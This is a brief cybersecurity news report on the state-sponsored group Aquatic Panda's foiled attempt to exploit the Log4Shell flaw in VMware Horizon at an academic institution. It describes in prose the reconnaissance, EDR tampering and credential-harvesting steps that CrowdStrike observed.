Aquatic Panda a China-based targeted intrusion has been observed leveraging critical flaws in the Apache Log4j logging library as an access vector to perform various post-exploitation operations, including reconnaissance and credential harvesting on targeted systems.
Crowdstrike a cybersecurity firm stated that the infiltration which was foiled was aimed at an unnamed “large academic institution”. The state-sponsored group is believed to have been in operation since mid-2020 collecting intelligence and industrial espionage with its attacks primarily directed against companies in the telecommunications, technology and government sectors.
This attempted intrusion exploited the newly discovered Log4Shell flaw (CVE-2021-44228, CVSS score: 10.0) with an aim to gain access to
a vulnerable instance of the VMware Horizon desktop and app virtualization product, followed by running a series of malicious commands orchestrated to fetch threat actor payloads hosted on a remote server.
“A modified version of the Log4j exploit was likely used during the course of the threat actor’s operations,” the researchers noted, adding it involved the use of an exploit that was published in GitHub on December 13, 2021.
The malicious behavior of Aquatic Panda went beyond conducting reconnaissance of the compromised host, starting with making an effort to stop a third-party endpoint detection and response (EDR) service, before proceeding to retrieve next-stage payloads designed to obtain a reverse shell and harvest credentials.
However after alerting the victim organization, the entity “was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.” As a result of disrupting the the attack, the intent remains unknown.